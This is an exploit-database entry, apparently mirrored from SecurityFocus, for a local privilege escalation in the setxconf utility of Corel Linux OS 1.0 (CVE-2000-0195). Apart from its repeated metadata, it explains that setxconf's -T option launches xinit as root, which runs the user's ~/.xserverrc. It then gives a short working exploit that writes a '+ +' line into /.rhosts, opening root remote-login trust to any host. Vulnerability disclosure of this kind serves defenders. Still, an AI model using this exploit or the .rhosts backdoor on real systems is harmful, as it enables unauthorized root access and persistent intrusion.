Corel Linux OS 1.0 - 'setxconf' Local Privilege Escalation
| EKU-ID: 25354 | CVE: CVE-2000-0195;OSVDB-1231 | OSVDB-ID: |
| Author: suid | Published: 2000-02-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 25354 | CVE: CVE-2000-0195;OSVDB-1231 | OSVDB-ID: |
| Author: suid | Published: 2000-02-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/1008/info A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root. cat > ~/.xserverrc echo "+ +" > /.rhosts